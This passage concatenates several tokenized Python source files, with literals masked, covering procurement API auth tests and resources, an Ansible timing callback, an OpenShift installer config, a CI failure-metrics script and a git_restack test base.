) != '<STR_LIT>' : <EOL> continue <EOL> source = disk . find ( '<STR_LIT>' ) <EOL> if not source . attrib . get ( '<STR_LIT:file>' ) : <EOL> continue <EOL> if os . path . exists ( source . attrib . get ( '<STR_LIT:file>' ) ) : <EOL> cleanup_list . append ( source . attrib . get ( '<STR_LIT:file>' ) ) <EOL> return cleanup_list </s>
<s> from setuptools import setup <EOL> import re <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as fd : <EOL> version = re . search ( r'<STR_LIT>' , <EOL> fd . read ( ) , re . MULTILINE ) . group ( <NUM_LIT:1> ) <EOL> if not version : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> install_requires = [ "<STR_LIT>" ] , <EOL> include_package_data = True , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:*>' ] <EOL> } <EOL> ) </s>
<s> import unittest <EOL> from pyramid import testing <EOL> from openprocurement . api . auth import AuthenticationPolicy <EOL> from pyramid . tests . test_authentication import TestBasicAuthAuthenticationPolicy <EOL> from openprocurement . api . tests . base import test_tender_data , test_organization , BaseWebTest , BaseTenderWebTest <EOL> class AuthTest ( TestBasicAuthAuthenticationPolicy ) : <EOL> def _makeOne ( self , check ) : <EOL> return AuthenticationPolicy ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> test_authenticated_userid_utf8 = None <EOL> test_authenticated_userid_latin1 = None <EOL> def test_unauthenticated_userid_bearer ( self ) : <EOL> request = testing . DummyRequest ( ) <EOL> request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> policy = self . _makeOne ( None ) <EOL> self . assertEqual ( policy . unauthenticated_userid ( request ) , '<STR_LIT>' ) <EOL> class AccreditationTenderTest ( BaseWebTest ) : <EOL> def test_create_tender_accreditation ( self ) : <EOL> self . app . authorization = ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' , { "<STR_LIT:data>" : test_tender_data } ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> for broker in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . app . authorization = ( '<STR_LIT>' , ( broker , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' , { "<STR_LIT:data>" : test_tender_data } , status = <NUM_LIT> ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( response . json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ "<STR_LIT:description>" ] , "<STR_LIT>" ) <EOL> class AccreditationTenderQuestionTest ( BaseTenderWebTest ) : <EOL> def test_create_tender_question_accreditation ( self ) : <EOL> self . app . authorization = ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT:title>' : '<STR_LIT>' , '<STR_LIT:description>' : '<STR_LIT>' , '<STR_LIT>' : test_organization } } ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> for broker in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . app . authorization = ( '<STR_LIT>' , ( broker , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT:title>' : '<STR_LIT>' , '<STR_LIT:description>' : '<STR_LIT>' , '<STR_LIT>' : test_organization } } , <EOL> status = <NUM_LIT> ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( response . json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ "<STR_LIT:description>" ] , "<STR_LIT>" ) <EOL> class AccreditationTenderBidTest ( BaseTenderWebTest ) : <EOL> initial_status = '<STR_LIT>' <EOL> def test_create_tender_bid_accreditation ( self ) : <EOL> self . app . authorization = ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT>' : [ test_organization ] , "<STR_LIT:value>" : { "<STR_LIT>" : <NUM_LIT> } } } ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> for broker in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . app . authorization = ( '<STR_LIT>' , ( broker , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT>' : [ test_organization ] , "<STR_LIT:value>" : { "<STR_LIT>" : <NUM_LIT> } } } , <EOL> status = <NUM_LIT> ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( response . json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ "<STR_LIT:description>" ] , "<STR_LIT>" ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( AuthTest ) ) <EOL> return suite <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( defaultTest = '<STR_LIT>' ) </s>
<s> from openprocurement . api . utils import ( <EOL> get_file , <EOL> save_tender , <EOL> upload_file , <EOL> apply_patch , <EOL> update_file_content_type , <EOL> opresource , <EOL> json_view , <EOL> context_unpack , <EOL> APIResource , <EOL> ) <EOL> from openprocurement . api . validation import ( <EOL> validate_file_update , <EOL> validate_file_upload , <EOL> validate_patch_document_data , <EOL> ) <EOL> @ opresource ( name = '<STR_LIT>' , <EOL> collection_path = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> procurementMethodType = '<STR_LIT>' , <EOL> description = "<STR_LIT>" ) <EOL> class TenderCancellationDocumentResource ( APIResource ) : <EOL> @ json_view ( permission = '<STR_LIT>' ) <EOL> def collection_get ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . params . get ( '<STR_LIT:all>' , '<STR_LIT>' ) : <EOL> collection_data = [ i . serialize ( "<STR_LIT>" ) for i in self . context . documents ] <EOL> else : <EOL> collection_data = sorted ( dict ( [ <EOL> ( i . id , i . serialize ( "<STR_LIT>" ) ) <EOL> for i in self . context . documents <EOL> ] ) . values ( ) , key = lambda i : i [ '<STR_LIT>' ] ) <EOL> return { '<STR_LIT:data>' : collection_data } <EOL> @ json_view ( validators = ( validate_file_upload , ) , permission = '<STR_LIT>' ) <EOL> def collection_post ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . validated [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . request . errors . add ( '<STR_LIT:body>' , '<STR_LIT:data>' , '<STR_LIT>' . format ( self . request . validated [ '<STR_LIT>' ] ) ) <EOL> self . request . errors . status = <NUM_LIT> <EOL> return <EOL> document = upload_file ( self . request ) <EOL> self . context . documents . append ( document ) <EOL> if save_tender ( self . request ) : <EOL> self . LOGGER . info ( '<STR_LIT>' . format ( document . id ) , <EOL> extra = context_unpack ( self . request , { '<STR_LIT>' : '<STR_LIT>' } , { '<STR_LIT>' : document . id } ) ) <EOL> self . request . response . status = <NUM_LIT> <EOL> document_route = self . request . matched_route . name . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . request . response . headers [ '<STR_LIT>' ] = self . request . current_route_url ( _route_name = document_route , document_id = document . id , _query = { } ) <EOL> return { '<STR_LIT:data>' : document . serialize ( "<STR_LIT>" ) } <EOL> @ json_view ( permission = '<STR_LIT>' ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . params . get ( '<STR_LIT>' ) : <EOL> return get_file ( self . request ) <EOL> document = self . request . validated [ '<STR_LIT>' ] <EOL> document_data = document . serialize ( "<STR_LIT>" ) <EOL> document_data [ '<STR_LIT>' ] = [ <EOL> i . serialize ( "<STR_LIT>" ) <EOL> for i in self . request . validated [ '<STR_LIT>' ] <EOL> if i . url != document . url <EOL> ] <EOL> return { '<STR_LIT:data>' : document_data } <EOL> @ json_view ( validators = ( validate_file_update , ) , permission = '<STR_LIT>' ) <EOL> def put ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . validated [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . request . errors . add ( '<STR_LIT:body>' , '<STR_LIT:data>' , '<STR_LIT>' . format ( self . request . validated [ '<STR_LIT>' ] ) ) <EOL> self . request . errors . status = <NUM_LIT> <EOL> return <EOL> document = upload_file ( self . request ) <EOL> self . request . validated [ '<STR_LIT>' ] . documents . append ( document ) <EOL> if save_tender ( self . request ) : <EOL> self . LOGGER . info ( '<STR_LIT>' . format ( self . request . context . id ) , <EOL> extra = context_unpack ( self . request , { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> return { '<STR_LIT:data>' : document . serialize ( "<STR_LIT>" ) } <EOL> @ json_view ( content_type = "<STR_LIT:application/json>" , validators = ( validate_patch_document_data , ) , permission = '<STR_LIT>' ) <EOL> def patch ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . validated [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . request . errors . add ( '<STR_LIT:body>' , '<STR_LIT:data>' , '<STR_LIT>' . format ( self . request . validated [ '<STR_LIT>' ] ) ) <EOL> self . request . errors . status = <NUM_LIT> <EOL> return <EOL> if apply_patch ( self . request , src = self . request . context . serialize ( ) ) : <EOL> update_file_content_type ( self . request ) <EOL> self . LOGGER . info ( '<STR_LIT>' . format ( self . request . context . id ) , <EOL> extra = context_unpack ( self . request , { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> return { '<STR_LIT:data>' : self . request . context . serialize ( "<STR_LIT>" ) } </s>
<s> '''<STR_LIT>''' <EOL> import time <EOL> class CallbackModule ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . stats = { } <EOL> self . current = None <EOL> def playbook_on_task_start ( self , name , is_conditional ) : <EOL> """<STR_LIT>""" <EOL> if self . current is not None : <EOL> self . stats [ self . current ] = time . time ( ) - self . stats [ self . current ] <EOL> self . current = name <EOL> self . stats [ self . current ] = time . time ( ) <EOL> def playbook_on_stats ( self , stats ) : <EOL> """<STR_LIT>""" <EOL> if self . current is not None : <EOL> self . stats [ self . current ] = time . time ( ) - self . stats [ self . current ] <EOL> results = sorted ( <EOL> self . stats . items ( ) , <EOL> key = lambda value : value [ <NUM_LIT:1> ] , <EOL> reverse = True , <EOL> ) <EOL> results = results [ : <NUM_LIT:10> ] <EOL> for name , elapsed in results : <EOL> print ( <EOL> "<STR_LIT>" . format ( <EOL> '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' . format ( elapsed ) , <EOL> ) <EOL> ) </s>
<s> import os <EOL> import yaml <EOL> from pkg_resources import resource_filename <EOL> PERSIST_SETTINGS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:version>' , <EOL> ] <EOL> DEFAULT_REQUIRED_FACTS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> PRECONFIGURED_REQUIRED_FACTS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class OOConfigFileError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class OOConfigInvalidHostError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Host ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . ip = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . hostname = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . public_ip = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . public_hostname = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . connect_to = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . preconfigured = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . new_host = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . master = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . node = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . master_lb = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . storage = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . containerized = kwargs . get ( '<STR_LIT>' , False ) <EOL> if self . connect_to is None : <EOL> raise OOConfigInvalidHostError ( "<STR_LIT>" "<STR_LIT>" ) <EOL> if self . master is False and self . node is False and self . master_lb is False and self . storage is False : <EOL> raise OOConfigInvalidHostError ( <EOL> "<STR_LIT>" ) <EOL> def __str__ ( self ) : <EOL> return self . connect_to <EOL> def __repr__ ( self ) : <EOL> return self . connect_to <EOL> def to_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for prop in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if getattr ( self , prop ) : <EOL> d [ prop ] = getattr ( self , prop ) <EOL> return d <EOL> def is_etcd_member ( self , all_hosts ) : <EOL> """<STR_LIT>""" <EOL> if not self . master : <EOL> return False <EOL> masters = [ host for host in all_hosts if host . master ] <EOL> if len ( masters ) > <NUM_LIT:1> : <EOL> return True <EOL> return False <EOL> def is_dedicated_node ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . node and not self . master <EOL> def is_schedulable_node ( self , all_hosts ) : <EOL> """<STR_LIT>""" <EOL> if not self . node : <EOL> return False <EOL> if not self . master : <EOL> return True <EOL> masters = [ host for host in all_hosts if host . master ] <EOL> nodes = [ host for host in all_hosts if host . node ] <EOL> if len ( masters ) == len ( nodes ) : <EOL> return True <EOL> return False <EOL> class OOConfig ( object ) : <EOL> default_dir = os . path . normpath ( <EOL> os . environ . get ( '<STR_LIT>' , <EOL> os . environ [ '<STR_LIT>' ] + '<STR_LIT>' ) + '<STR_LIT>' ) <EOL> default_file = '<STR_LIT>' <EOL> def __init__ ( self , config_path ) : <EOL> if config_path : <EOL> self . config_path = os . path . normpath ( config_path ) <EOL> else : <EOL> self . config_path = os . path . normpath ( self . default_dir + <EOL> self . default_file ) <EOL> self . settings = { } <EOL> self . _read_config ( ) <EOL> self . _set_defaults ( ) <EOL> def _read_config ( self ) : <EOL> self . hosts = [ ] <EOL> try : <EOL> if os . path . exists ( self . config_path ) : <EOL> cfgfile = open ( self . config_path , '<STR_LIT:r>' ) <EOL> self . settings = yaml . safe_load ( cfgfile . read ( ) ) <EOL> cfgfile . close ( ) <EOL> if '<STR_LIT>' in self . settings : <EOL> self . _upgrade_legacy_config ( ) <EOL> if '<STR_LIT>' in self . settings : <EOL> for host in self . settings [ '<STR_LIT>' ] : <EOL> self . hosts . append ( Host ( ** host ) ) <EOL> if '<STR_LIT>' in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = str ( self . settings [ '<STR_LIT>' ] ) <EOL> except IOError , ferr : <EOL> raise OOConfigFileError ( '<STR_LIT>' . format ( ferr . filename , <EOL> ferr . strerror ) ) <EOL> except yaml . scanner . ScannerError : <EOL> raise OOConfigFileError ( <EOL> '<STR_LIT>' . format ( self . config_path ) ) <EOL> def _upgrade_legacy_config ( self ) : <EOL> new_hosts = [ ] <EOL> remove_settings = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:Name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if '<STR_LIT>' in self . settings : <EOL> for key , value in self . settings [ '<STR_LIT>' ] . iteritems ( ) : <EOL> value [ '<STR_LIT>' ] = key <EOL> if '<STR_LIT>' in self . settings and key in self . settings [ '<STR_LIT>' ] : <EOL> value [ '<STR_LIT>' ] = True <EOL> if '<STR_LIT>' in self . settings and key in self . settings [ '<STR_LIT>' ] : <EOL> value [ '<STR_LIT>' ] = True <EOL> new_hosts . append ( value ) <EOL> self . settings [ '<STR_LIT>' ] = new_hosts <EOL> for s in remove_settings : <EOL> if s in self . settings : <EOL> del self . settings [ s ] <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def _set_defaults ( self ) : <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = self . _default_ansible_inv_dir ( ) <EOL> if not os . path . exists ( self . settings [ '<STR_LIT>' ] ) : <EOL> os . makedirs ( self . settings [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = resource_filename ( __name__ , '<STR_LIT>' ) <EOL> if '<STR_LIT:version>' not in self . settings : <EOL> self . settings [ '<STR_LIT:version>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' % self . settings [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' . format ( os . path . dirname ( self . config_path ) ) <EOL> for setting in self . settings . keys ( ) : <EOL> if not self . settings [ setting ] : <EOL> self . settings . pop ( setting ) <EOL> def _default_ansible_inv_dir ( self ) : <EOL> return os . path . normpath ( <EOL> os . path . dirname ( self . config_path ) + "<STR_LIT>" ) <EOL> def calc_missing_facts ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for host in self . hosts : <EOL> missing_facts = [ ] <EOL> if host . preconfigured : <EOL> required_facts = PRECONFIGURED_REQUIRED_FACTS <EOL> else : <EOL> required_facts = DEFAULT_REQUIRED_FACTS <EOL> for required_fact in required_facts : <EOL> if not getattr ( host , required_fact ) : <EOL> missing_facts . append ( required_fact ) <EOL> if len ( missing_facts ) > <NUM_LIT:0> : <EOL> result [ host . connect_to ] = missing_facts <EOL> return result <EOL> def save_to_disk ( self ) : <EOL> out_file = open ( self . config_path , '<STR_LIT:w>' ) <EOL> out_file . write ( self . yaml ( ) ) <EOL> out_file . close ( ) <EOL> def persist_settings ( self ) : <EOL> p_settings = { } <EOL> for setting in PERSIST_SETTINGS : <EOL> if setting in self . settings and self . settings [ setting ] : <EOL> p_settings [ setting ] = self . settings [ setting ] <EOL> p_settings [ '<STR_LIT>' ] = [ ] <EOL> for host in self . hosts : <EOL> p_settings [ '<STR_LIT>' ] . append ( host . to_dict ( ) ) <EOL> if self . settings [ '<STR_LIT>' ] != self . _default_ansible_inv_dir ( ) : <EOL> p_settings [ '<STR_LIT>' ] = self . settings [ '<STR_LIT>' ] <EOL> return p_settings <EOL> def yaml ( self ) : <EOL> return yaml . safe_dump ( self . persist_settings ( ) , default_flow_style = False ) <EOL> def __str__ ( self ) : <EOL> return self . yaml ( ) <EOL> def get_host ( self , name ) : <EOL> for host in self . hosts : <EOL> if host . connect_to == name : <EOL> return host <EOL> return None </s>
<s> import argparse <EOL> import collections <EOL> import logging <EOL> import operator <EOL> import os <EOL> import re <EOL> import time <EOL> from launchpadlib import launchpad <EOL> import elastic_recheck . elasticRecheck as er <EOL> import elastic_recheck . results as er_results <EOL> LPCACHEDIR = os . path . expanduser ( '<STR_LIT>' ) <EOL> def get_options ( ) : <EOL> parser = argparse . ArgumentParser ( <EOL> description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" , <EOL> type = bool , <EOL> default = False ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" , <EOL> type = bool , <EOL> default = True ) <EOL> return parser . parse_args ( ) <EOL> def all_fails ( classifier ) : <EOL> """<STR_LIT>""" <EOL> all_fails = { } <EOL> query = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> results = classifier . hits_by_query ( query , size = <NUM_LIT> ) <EOL> facets = er_results . FacetSet ( ) <EOL> facets . detect_facets ( results , [ "<STR_LIT>" ] ) <EOL> for build in facets : <EOL> for result in facets [ build ] : <EOL> if re . search ( "<STR_LIT>" , result . project ) : <EOL> all_fails [ "<STR_LIT>" % ( build , result . build_name ) ] = False <EOL> return all_fails <EOL> def num_fails_per_build_name ( all_jobs ) : <EOL> counts = collections . defaultdict ( int ) <EOL> for f in all_jobs : <EOL> build , job = f . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> counts [ job ] += <NUM_LIT:1> <EOL> return counts <EOL> def classifying_rate ( fails , data ) : <EOL> """<STR_LIT>""" <EOL> for bugnum in data : <EOL> bug = data [ bugnum ] <EOL> for job in bug [ '<STR_LIT>' ] : <EOL> fails [ job ] = True <EOL> total = len ( fails . keys ( ) ) <EOL> bad_jobs = collections . defaultdict ( int ) <EOL> count = <NUM_LIT:0> <EOL> for f in fails : <EOL> if fails [ f ] is True : <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> build , job = f . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> bad_jobs [ job ] += <NUM_LIT:1> <EOL> print ( "<STR_LIT>" % <EOL> ( ( float ( count ) / float ( total ) ) * <NUM_LIT> ) ) <EOL> sort = sorted ( <EOL> bad_jobs . iteritems ( ) , <EOL> key = operator . itemgetter ( <NUM_LIT:1> ) , <EOL> reverse = True ) <EOL> print ( "<STR_LIT>" ) <EOL> for s in sort : <EOL> print "<STR_LIT>" % ( s [ <NUM_LIT:1> ] , s [ <NUM_LIT:0> ] ) <EOL> def _status_count ( results ) : <EOL> counts = { } <EOL> facets = er_results . FacetSet ( ) <EOL> facets . detect_facets ( <EOL> results , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for key in facets : <EOL> counts [ key ] = len ( facets [ key ] ) <EOL> return counts <EOL> def _failure_count ( hits ) : <EOL> if "<STR_LIT>" in hits : <EOL> return hits [ "<STR_LIT>" ] <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _failed_jobs ( results ) : <EOL> failed_jobs = [ ] <EOL> facets = er_results . FacetSet ( ) <EOL> facets . detect_facets ( <EOL> results , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in facets : <EOL> for build in facets [ "<STR_LIT>" ] : <EOL> for result in facets [ "<STR_LIT>" ] [ build ] : <EOL> failed_jobs . append ( "<STR_LIT>" % ( build , result . build_name ) ) <EOL> return failed_jobs <EOL> def _count_fails_per_build_name ( hits ) : <EOL> facets = er_results . FacetSet ( ) <EOL> counts = collections . defaultdict ( int ) <EOL> facets . detect_facets ( <EOL> hits , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in facets : <EOL> for build_name in facets [ "<STR_LIT>" ] : <EOL> counts [ build_name ] += <NUM_LIT:1> <EOL> return counts <EOL> def _failure_percentage ( hits , fails ) : <EOL> total_fails_per_build_name = num_fails_per_build_name ( fails ) <EOL> fails_per_build_name = _count_fails_per_build_name ( hits ) <EOL> per = { } <EOL> for build in fails_per_build_name : <EOL> this_job = fails_per_build_name [ build ] <EOL> if build in total_fails_per_build_name : <EOL> total = total_fails_per_build_name [ build ] <EOL> per [ build ] = ( float ( this_job ) / float ( total ) ) * <NUM_LIT> <EOL> return per <EOL> def collect_metrics ( classifier , fails ) : <EOL> data = { } <EOL> for q in classifier . queries : <EOL> start = time . time ( ) <EOL> results = classifier . hits_by_query ( q [ '<STR_LIT>' ] , size = <NUM_LIT> ) <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . debug ( "<STR_LIT>" % <EOL> ( time . time ( ) - start , q [ '<STR_LIT>' ] ) ) <EOL> hits = _status_count ( results ) <EOL> data [ q [ '<STR_LIT>' ] ] = { <EOL> '<STR_LIT>' : _failure_count ( hits ) , <EOL> '<STR_LIT>' : hits , <EOL> '<STR_LIT>' : _failure_percentage ( results , fails ) , <EOL> '<STR_LIT>' : q [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : _failed_jobs ( results ) <EOL> } <EOL> return data <EOL> def print_metrics ( data , with_lp = False ) : <EOL> print "<STR_LIT>" <EOL> print <EOL> sorted_data = sorted ( data . iteritems ( ) , <EOL> key = lambda x : - x [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> for d in sorted_data : <EOL> bug = d [ <NUM_LIT:0> ] <EOL> data = d [ <NUM_LIT:1> ] <EOL> print ( "<STR_LIT>" <EOL> % ( bug , data [ '<STR_LIT>' ] . rstrip ( ) ) ) <EOL> if with_lp : <EOL> get_launchpad_bug ( d [ <NUM_LIT:0> ] ) <EOL> print "<STR_LIT>" <EOL> for s in data [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % ( s , data [ '<STR_LIT>' ] [ s ] ) <EOL> print "<STR_LIT>" <EOL> for s in data [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % ( s , data [ '<STR_LIT>' ] [ s ] ) <EOL> print <EOL> def get_launchpad_bug ( bug ) : <EOL> lp = launchpad . Launchpad . login_anonymously ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> LPCACHEDIR ) <EOL> lp_bug = lp . bugs [ bug ] <EOL> print "<STR_LIT>" % lp_bug . title <EOL> targets = map ( lambda x : ( x . bug_target_name , x . status ) , lp_bug . bug_tasks ) <EOL> print "<STR_LIT>" <EOL> for target , status in targets : <EOL> print "<STR_LIT>" % ( target , status ) <EOL> def main ( ) : <EOL> opts = get_options ( ) <EOL> classifier = er . Classifier ( opts . dir ) <EOL> fails = all_fails ( classifier ) <EOL> data = collect_metrics ( classifier , fails ) <EOL> print_metrics ( data , with_lp = opts . lp ) <EOL> if opts . rate : <EOL> classifying_rate ( fails , data ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import os <EOL> import fixtures <EOL> import testtools <EOL> from git_restack . tests import utils <EOL> class BaseGitRestackTestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( BaseGitRestackTestCase , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . Timeout ( <NUM_LIT:2> * <NUM_LIT> , True ) ) <EOL> self . root_dir = self . useFixture ( fixtures . TempDir ( ) ) . path <EOL> self . upstream_dir = os . path . join ( self . root_dir , "<STR_LIT>" ) <EOL> self . local_dir = os . path . join ( self . root_dir , "<STR_LIT>" ) <EOL> os . makedirs ( self . _dir ( '<STR_LIT>' ) ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _simple_change ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _simple_change ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _simple_change ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> gitreview = '<STR_LIT>' <EOL> self . _simple_change ( '<STR_LIT>' , gitreview , '<STR_LIT>' , <EOL> file_ = self . _dir ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _dir ( self , base , * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( getattr ( self , base + '<STR_LIT>' ) , * args ) <EOL> def _run_git ( self , dirname , command , * args ) : <EOL> """<STR_LIT>""" <EOL> if command == '<STR_LIT>' : <EOL> return utils . run_git ( command , args [ <NUM_LIT:0> ] , self . _dir ( dirname ) ) <EOL> return utils . run_git ( '<STR_LIT>' + self . _dir ( dirname , '<STR_LIT>' ) , <EOL> '<STR_LIT>' + self . _dir ( dirname ) , <EOL> command , * args ) <EOL> def _run_git_restack ( self , * args , ** kwargs ) : 